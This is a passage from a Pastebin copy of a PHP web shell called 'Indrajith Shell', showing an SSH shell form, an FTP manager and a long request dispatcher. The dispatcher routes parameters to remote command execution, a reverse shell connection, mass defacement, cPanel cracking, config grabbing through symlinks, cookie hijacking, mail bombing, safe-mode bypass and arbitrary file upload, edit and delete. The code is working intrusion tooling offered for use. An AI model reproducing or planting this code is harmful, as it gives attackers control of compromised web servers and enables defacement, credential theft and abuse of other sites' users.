  1963.             echo $line."\n";
  1964.         }
  1965.         ?>
  1966.     <div id=result><center><h2>SSH Shell by Indrajith Shell</h2><hr /><br /><br /><textarea class='textarea_edit' rows=20 cols=60></textarea>
  1967.     <form method='GET'>CMD : <input name='ssh_cmd' size=60><input type='submit' value='   >>   ' /></form></center><br /><br /><hr /><br /><br /></div>
  1968.         <?php
  1969.     }
  1970.     else
  1971.     {
  1972.     ?>
  1973.     <div id=result><center><h2>SSH Shell by Indrajith Shell</h2><hr /><br /><br /><textarea class='textarea_edit' rows=20 cols=60></textarea>
  1974.     <form method='GET'>CMD : <input name='ssh_cmd' size=60><input type='submit' value='   >>   ' /></form></center><br /><br /><hr /><br /><br /></div>
  1975.     <?php
  1976.     }
  1977. }
  1978.  
  1979. function ftp_man_ui()
  1980. {
  1981.     ?>
  1982.     <div id=result><center><h2>FTP Manager</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td>HOST : </td><td><input size=50 name='ftp_host'></td></tr>
  1983.     <tr><td>Username : </td><td><input size=50 name='ftp_user'></td></tr>
  1984.     <tr><td>Password : </td><td><input size=50 name='ftp_pass'></td></tr>
  1985.     <tr><td>Path [<font color=red>Optional</font>] : </td><td><input name='fpath' size=50></td></tr>
  1986.     <tr><td>Upload File From Server [<font color=red>Optional</font>] : </td><td><input name='upload_file' size=50></td></tr>
  1987.     <tr><td>Download File To Server [<font color=red>Optional</font>] : </td><td><input name='download_file' size=50></td></tr>
  1988.     <tr><td></td><td><input type='submit' value='   >>   ' /></form></table></center><br /><br /><hr /><br /><br /></div>
  1989.     <?php
  1990. }
  1991.  
  1992. function ftp_man_bg()
  1993. {
  1994.     echo "<div id=result><center><h2>FTP FILEMANAGER</h2></center><hr />";
  1995.     $fhost=$_GET['ftp_host'];
  1996.     $fuser=$_GET['ftp_user'];
  1997.     $fpass=$_GET['ftp_pass'];
  1998.     $fpath=$_GET['fpath'];
  1999.     $upl=$_GET['upload_file'];
  2000.     $down=$_GET['download_file'];
  2001.     if($fpath=="")
  2002.     {
  2003.         $fpath=ftp_pwd($conn);
  2004.     }
  2005.     $conn=ftp_connect($fhost);
  2006.     if(!$conn)
  2007.     {
  2008.         alert("FTP Host Not Found!!!");
  2009.     }
  2010.     $log=ftp_login($conn, $fuser, $fpass);
  2011.     if(!$log)
  2012.     {
  2013.         alert("FTP Authorication Failed");
  2014.     }
  2015.     if($upl!="")
  2016.     {
  2017.         $fp = fopen($upl, 'r');
  2018.         if (ftp_fput($conn, $upl, $fp, FTP_ASCII))
  2019.         {
  2020.             echo "<center><font color=green>Successfully uploaded <font color=red> $upl </font> </font></center>";
  2021.         }
  2022.         else
  2023.         {
  2024.             echo "<center><font color=red>There was a problem while uploading <font color=green> $upl </font> </font></center>";
  2025.         }
  2026.     }
  2027.     if($down!="")
  2028.     {
  2029.         $handle = fopen($down, 'w');
  2030.         if (ftp_fget($conn, $handle, $down, FTP_ASCII, 0))
  2031.         {
  2032.             echo "<center><font color=green>successfully written to <font color=red> $down </font> </font></center>";
  2033.         }
  2034.         else
  2035.         {
  2036.             echo "<center><font color=red>There was a problem while downloading <font color=green> $down </font> to <font color=green> $down </font> </font></center>";
  2037.         }
  2038.     }
  2039.     echo "<table class='table'><tr><th>Files</th>";
  2040.     ftp_chdir($fpath);
  2041.     $list=ftp_rawlist($conn, $fpath);
  2042.     foreach($list as $fff)
  2043.     {
  2044.         echo "<tr><td><pre>$fff</pre></td></tr>";
  2045.     }
  2046.     echo "</table></div>";
  2047. }
  2048.  
  2049. //////////////////////////////// Frond End Calls ///////////////////////////////
  2050.  
  2051. if(isset($_POST['e_file']) && isset($_POST['e_content_n']))
  2052. {
  2053.     edit_file_bg();
  2054. }
  2055.  
  2056. else if(isset($_REQUEST['sh311_scanner']))
  2057. {
  2058.     shell_finder_ui();
  2059. }
  2060.  
  2061. else if(isset($_REQUEST['ftp_host']) && isset($_REQUEST['ftp_user']) && isset($_REQUEST['ftp_pass']))
  2062. {
  2063.     ftp_man_bg();
  2064. }
  2065.  
  2066. else if(isset($_REQUEST['ftpman']))
  2067. {
  2068.     ftp_man_ui();
  2069. }
  2070.  
  2071. else if(isset($_GET['ssh_host']) && isset($_GET['ssh_user']) && isset($_GET['ssh_pass']))
  2072. {
  2073.     ssh_man_bg();
  2074. }
  2075.  
  2076. else if(isset($_REQUEST['sshman']))
  2077. {
  2078.     ssh_man_ui();
  2079. }
  2080.  
  2081. else if(isset($_REQUEST['c0de_inject']) && isset($_REQUEST['path']))
  2082. {
  2083.     chdir($_GET['path']);
  2084.     code_in_ui();
  2085. }
  2086.  
  2087. else if(isset($_GET['sh311_scanx']))
  2088. {
  2089.     shell_finder_bg();
  2090. }
  2091.  
  2092. else if(isset($_REQUEST['config_grab']))
  2093. {
  2094.     sym_xxx();
  2095. }
  2096.  
  2097. else if(isset($_REQUEST['ftp_man']))
  2098. {
  2099.     ftp_man_ui();
  2100. }
  2101.  
  2102. else if(isset($_REQUEST['mass_xploit']))
  2103. {
  2104.     mass_deface_ui();
  2105. }
  2106.  
  2107. else if(isset($_GET['f_host']) && isset($_GET['f_user']) && isset($_GET['f_pass']))
  2108. {
  2109.     ftp_man_bg();
  2110. }
  2111.  
  2112. else if(isset($_GET['mass_name']) && isset($_GET['mass_cont']))
  2113. {
  2114.     mass_deface_bg();
  2115. }
  2116.  
  2117. else if(isset($_REQUEST['ftp_anon_scan']))
  2118. {
  2119.     ftp_anonymous_ui();
  2120. }
  2121.  
  2122. else if(isset($_GET['ftp_anonz']))
  2123. {
  2124.     ftp_anonymous_bg();
  2125. }
  2126.  
  2127. else if(isset($_REQUEST['killme']))
  2128. {
  2129.     killme();
  2130. }
  2131.  
  2132. else if(isset($_REQUEST['hexenc']))
  2133. {
  2134.     hex_encode_ui();
  2135. }
  2136.  
  2137. else if(isset($_REQUEST['remotefiledown']))
  2138. {
  2139.     remote_download_ui();
  2140. }
  2141.  
  2142. else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile']) && isset($_GET['path']))
  2143. {
  2144.     remote_download_bg();
  2145. }
  2146.  
  2147. else if(isset($_REQUEST['cpanel_crack']))
  2148. {
  2149.     cpanel_crack();
  2150. }
  2151.  
  2152. else if(isset($_REQUEST['rem_web']) && isset($_REQUEST['tryzzz']))
  2153. {
  2154.     remote_file_check_bg();
  2155. }
  2156.  
  2157. else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc']) && isset($_REQUEST['php_content']))
  2158. {
  2159.     php_ende_bg();
  2160. }
  2161.  
  2162. else if(isset($_REQUEST['remote_server_scan']))
  2163. {
  2164.     remote_file_check_ui();
  2165. }
  2166.  
  2167. else if(isset($_REQUEST['server_exploit_details']))
  2168. {
  2169.     exploit_details();
  2170. }
  2171.  
  2172. else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail']) && isset($_REQUEST['subject_mail']) && isset($_REQUEST['mail_content']))
  2173. {
  2174.     massmailer_bg();
  2175. }
  2176.  
  2177. else if(isset($_REQUEST['mysqlman']))
  2178. {
  2179.     mysqlman();
  2180. }
  2181.  
  2182. else if(isset($_REQUEST['bomb_to']) && isset($_REQUEST['bomb_subject']) && isset($_REQUEST['bmail_content']))
  2183. {
  2184.     mailbomb_bg();
  2185. }
  2186.  
  2187. else if(isset($_REQUEST['cookiejack']))
  2188. {
  2189.     cookie_jack();
  2190. }
  2191.  
  2192. else if(isset($_REQUEST['massmailer']))
  2193. {
  2194.     massmailer_ui();
  2195. }
  2196.  
  2197. else if(isset($_REQUEST['rename']))
  2198. {
  2199.     chdir($_GET['path']);
  2200.     rename_ui();
  2201. }
  2202.  
  2203. else if(isset($_GET['old_name']) && isset($_GET['new_name']))
  2204. {
  2205.     chdir($_GET['path']);
  2206.     rename_bg();
  2207. }
  2208.  
  2209. else if(isset($_REQUEST['encodefile']))
  2210. {
  2211.     php_ende_ui();
  2212. }
  2213.  
  2214. else if(isset($_REQUEST['edit']))
  2215. {
  2216.     edit_file();
  2217. }
  2218.  
  2219. else if(isset($_REQUEST['down']) && isset($_REQUEST['path']))
  2220. {
  2221.     download();
  2222. }
  2223.  
  2224. else if(isset($_REQUEST['gzip']) && isset($_REQUEST['path']))
  2225. {
  2226.     download_gzip();
  2227. }
  2228.  
  2229. else if(isset($_REQUEST['read']))
  2230. {
  2231.     chdir($_GET['path']);
  2232.     code_viewer();
  2233. }
  2234.  
  2235. else if(isset($_REQUEST['perm']))
  2236. {
  2237.     chdir($_GET['path']);
  2238.     ch_perm_ui();
  2239. }
  2240.  
  2241. else if(isset($_GET['path']) && isset($_GET['p_filex']) && isset($_GET['new_perm']))
  2242. {
  2243.     chdir($_GET['path']);
  2244.     ch_perm_bg();
  2245. }
  2246.  
  2247. else if(isset($_REQUEST['del_fil']))
  2248. {
  2249.     chdir($_GET['path']);
  2250.     delete_file();
  2251.     exit;
  2252. }
  2253. else if(isset($_REQUEST['phpinfo']))
  2254. {
  2255.     chdir($_GET['path']);
  2256.     ob_clean();
  2257.     echo phpinfo();
  2258.     exit;
  2259. }
  2260. else if(isset($_REQUEST['del_dir']))
  2261. {
  2262.     chdir($_GET['path']);
  2263.     $d_dir=$_GET['del_dir'];
  2264.     deldirs($d_dir);
  2265. }
  2266. else if(isset($_GET['path']) && isset($_GET['new_file']))
  2267. {
  2268.     chdir($_GET['path']);
  2269.     mk_file_ui();
  2270. }
  2271. else if(isset($_GET['path']) && isset($_GET['new_f_name']) && isset($_GET['n_file_content']))
  2272. {
  2273.     mk_file_bg();
  2274. }
  2275. else if(isset($_GET['path']) && isset($_GET['new_dir']))
  2276. {
  2277.     chdir($_GET['path']);
  2278.     create_dir();
  2279. }
  2280. else if(isset($_GET['path']) && isset($_GET['cmdexe']))
  2281. {
  2282.     chdir($_GET['path']);
  2283.     cmd();
  2284. }
  2285. else if(isset($_POST['upload_f']) && isset($_POST['path']))
  2286. {
  2287.     upload_file();
  2288. }
  2289. else if(isset($_REQUEST['rs']))
  2290. {
  2291.     reverse_conn_ui();
  2292. }
  2293. else if(isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port']))
  2294. {
  2295.     reverse_conn_bg();
  2296. }
  2297. else if(isset($_REQUEST['safe_mod']) && isset($_REQUEST['path']))
  2298. {
  2299.     chdir($_GET['path']);
  2300.     safe_mode_fuck_ui();
  2301. }
  2302. else if(isset($_GET['path']) && isset($_GET['safe_mode']))
  2303. {
  2304.     safe_mode_fuck();
  2305. }
  2306. else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir']))
  2307. {
  2308.     AccessDenied();
  2309. }
  2310.  
  2311. else if(isset($_REQUEST['symlink']))
  2312. {
  2313.     sym_link();
  2314. }
  2315.  
  2316. else if(isset($_GET['path']) && isset($_GET['copy']))
  2317. {
  2318.     copy_file_ui();
  2319. }
  2320. else if(isset($_GET['c_file']) && isset($_GET['c_target']) &&isset($_GET['cn_name']))
  2321. {
  2322.     copy_file_bg();
  2323. }
  2324. else
  2325. {
  2326.     filemanager_bg();
  2327. }
  2328.  
  2329. ////////////////////////////// End Frond End Calls //////////////////////////////
  2330.  
  2331. echo "</div><div id=result><center><p><table class='tbl'>
  2332.      <tr><td><form method='GET'>PWD : <input size='50' name='path' value=".getcwd()."><input type='submit' value='   >>   ' /></form></td></tr></table>
  2333.      <table class='tbl'><tr>
  2334.          <td><form style='float:right;' method='GET'><input name='path' value=".getcwd()." type=hidden><span> New File : </span><input type='submit' value='   >>   ' ><input size='40' name='new_file' /></form>
  2335.          </td>
  2336.          <td><form  style='float:left;' method='GET'><input name='path' value=".getcwd()." type=hidden><input size='40' name='new_dir'><input type='submit' value='   >>   ' /><span> : New Dir</span></form>
  2337.          </td>
  2338.      </tr>
  2339.      <tr>
  2340.          <td><form style='float:right;' method='GET'><input style='float:left;' name='path' value=".getcwd()." type=hidden><span>CMD : </span><input type='submit' value='   >>   ' ><input name='cmdexe' size='40' /></form>
  2341.          </td>
  2342.          <td><form style='float:left;' method='POST' enctype=\"multipart/form-data\"><input name='path' value=".getcwd()." type=hidden><input size='27' name='upload_f' type='file'><input type='submit' name='upload_f' value='   >>   ' /><span> : Upload File</span></form>
  2343.          </td>
  2344.        </tr>
  2345.      </table></p><p><font size=4 color=green>&copy <a style='color:green; text-decoration:none;' href=http://facebook.com/ajithkp560>AJITH KP</a> & <a style='color:green; text-decoration:none;' href='http://www.facebook.com/vishnunathkp'>VISHNU NATH KP</a> &copy</font><br />&reg TOF [2012] &reg</div>"
  2346. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top